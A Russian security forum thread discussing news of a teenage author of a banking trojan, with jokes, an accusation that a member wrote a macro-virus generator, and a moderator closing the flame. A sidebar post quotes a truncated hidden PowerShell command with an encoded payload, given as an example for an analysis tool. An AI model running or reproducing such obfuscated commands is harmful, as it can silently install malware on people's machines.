Перейти к содержанию
AM_Bot

Из хакеров в компьютерную безопасность?

Recommended Posts

AM_Bot

В результате распространения модифицированной версии банковского трояна было заражено более 2300 компьютеров. Создателем этого вредоноса оказался юный хакер, который хотел стать консультантом по компьютерной безопасности.

Читать далее

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Михуил

с 14 лет одержим компьютерными он-лайн играми, в результате чего «он полностью погрузился в мир кибер-фэнтези» :D вот он вред от компьютерных игр, это все они они :D:D гыгыгы

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
NEX
вот он вред от компьютерных игр, это все они они biggrin.gif biggrin.gif гыгыгы

Ну так а как же? Поиграл в игрушку, решил проверить, получится - не получится....а тут раз - и получилось, да еще как! :)

Только страшно становится, сколько таких "хакеров- самоучек" расплодилось?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Все сначала начинают с игрушек, потому переходят к разгонке компов, экспериментам с ОС, варезу, пробуют что-то поломать и понеслась ... :)

У нас тут тоже такой есть один - Mr. Belyash, он же бета-тестер и фанат Доктора :)

Это был генератор макро-вирусов W97M.Belyash ;)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr.Belyash
Все сначала начинают с игрушек, потому переходят к разгонке компов, экспериментам с ОС, варезу, пробуют что-то поломать и понеслась ... :)

У нас тут тоже такой есть один - Mr. Belyash, он же бета-тестер и фанат Доктора :)

Это был генератор макро-вирусов W97M.Belyash ;)

я дико извиняюсь,а откуда Вы могли видеть что-либо написанное мной?

Насколько я помню-я не распространял то что писал.

Так где вы могли взять сэмпл?

Раньше насколько я помню портал был независимый и сэмпл в лаборатории ЛК вы взять не могли...Или это не так? :facepalm:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.
я дико извиняюсь,а откуда Вы могли видеть что-либо написанное мной?

Насколько я помню-я не распространял то что писал.

Так где вы могли взять сэмпл?

Раньше насколько я помню портал был независимый и сэмпл в лаборатории ЛК вы взять не могли...Или это не так? :facepalm:

Дурака не включай, да

http://mrbelyash.ucoz.ru/publ/1-1-0-1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.
Скачать "вирус" где?

Чтобы утверждать что ты писал вирусы и знать их названия - не надо обладать файлом.

Ссылка выше была приведена.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr.Belyash
Чтобы утверждать что ты писал вирусы и знать их названия - не надо обладать файлом.

Ссылка выше была приведена.

Минутку-минутку....писал и распространял?

Поделитесь...очень таки интересно.

Вы утверждаете что где-то написанное мною было выложено в сети? :rolleyes:

Или было просто написано и отправлено в вирлаб?

Или вирлаб уже сам распространял? :D

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr. Justice

Флейм удален. Тема закрыта. Если есть что сказать по делу - пишите мне в личку - открою.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Гость
Эта тема закрыта для публикации ответов.

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×